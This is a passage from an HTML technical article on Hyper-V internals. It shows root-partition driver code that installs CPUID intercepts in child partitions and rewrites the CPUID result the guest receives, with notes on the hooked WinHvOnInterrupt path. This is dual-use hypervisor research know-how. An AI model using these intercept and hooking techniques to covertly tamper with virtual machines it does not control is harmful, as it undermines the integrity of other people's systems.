<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_INTERCEPT_PARAMETERS</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Parameters = {0};</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> hvStatus = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PARTITION_ID</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PartID = 0x0, NextPartID = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// If a guest executes cpuid with 0x11114444 in eax, the hypervisor intercepts it</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// and sends a message to the parent partition, which processes the result.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"SetupInterception was called"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Parameters.CpuidIndex = 0x11114444;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Descriptor.Type = HvInterceptTypeX64Cpuid;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Descriptor.Parameters = Parameters;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvStatus = WinHvGetPartitionId(&PartID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">do</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvStatus = WinHvGetNextChildPartition(PartID, NextPartID, &NextPartID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (NextPartID != 0){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Child partition id"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, NextPartID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> hvStatus = WinHvInstallIntercept(NextPartID, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_INTERCEPT_ACCESS_MASK_EXECUTE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, &Descriptor);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"hvstatus of WinHvInstallIntercept = "</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, hvStatus);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">while</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ((NextPartID != </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PARTITION_ID_INVALID</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) && (hvStatus == 0));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also change PrintCpuidInterceptMessage so that, if the guest OS EAX register (or RAX, if the CPUID instruction is executed in long mode) contains the value 0x11114444, the value 0x12345678 is written into the DefaultResultRdx field of the HV_X64_CPUID_INTERCEPT_MESSAGE structure located in SIM slot zero:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">void</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PrintCpuidInterceptMessage(</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: grey; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvMessage</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_X64_CPUID_INTERCEPT_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> phvCPUID = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_X64_CPUID_INTERCEPT_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: white; color: grey; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvMessage</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Payload;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRax"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->DefaultResultRax);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRbx"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->DefaultResultRbx);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRcx"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->DefaultResultRcx);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRdx"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->DefaultResultRdx);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (phvCPUID->Rax == 0x11114444){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->DefaultResultRdx = 0x12345678;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog16</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->Header.Rip"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->Header.Rip);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Interception was handled"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To check it, run in the guest OS a test utility that executes cpuid with eax equal to 0x11114444. Before the intercept is installed, the utility displays the following result:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="45" src="https://lh3.googleusercontent.com/wva5c9U2b9gWwliLjKNK8Ay9WGYHL9G1TqPkqypUQvgavuAjIzf8iSYqLBlmKJc7fvzNVKkMq8TwMc3mMolrhNmWpP2ozNcVQZttCgIVEpYChvbXKuBr92RZFcYwEsHws4zv1BayiNhNlBXx" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="103" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the intercept is activated, the result is:</span><span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="44" src="https://lh6.googleusercontent.com/lm_bVhBA7wx7VMvVIg99cOg5p8IYc2LjGzPFkyrQyVim8fk_50lEMjdG2JXxoYIgFpxIaKNyTmaM7s6LcdhGlgFfeKvJKRvsjzG4Fu3HhD2b8C66FdGp42lz0c2gsE_7XuziiyIJWOdBUdMV" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="100" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At the same time, the following message is displayed in the Windows root OS:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="68" src="https://lh4.googleusercontent.com/bcIvUYPNqGlbtrfOjxVIhr9yaZp8K_nVFc5j46FCOPqLXOoNXS6QGma_1sOdkQla2engWyn44NIHoJXRs4_GsbgQTclAAK4m62BRflyguDxSZ3Lif_JM2PYmoaAsPL9SyIPBO3kZBnVJOM7z" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="453" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Note right away that this trick works only if the root OS has not previously installed an interception for the specified conditions. Otherwise, after the hyperv4 driver replaces the value, control is passed back to the original WinHvOnInterrupt, which invokes the handler of the vid.sys driver (this function is the fourth parameter of winhvr!WinHvCreatePartition, called in the root OS to create the child partition when the virtual machine starts), and that may lead to a different result. In our case no such handler was installed, of course, so the hypervisor analysed the data in SIM0 and patched the result of the CPUID instruction.</span></div>
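<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
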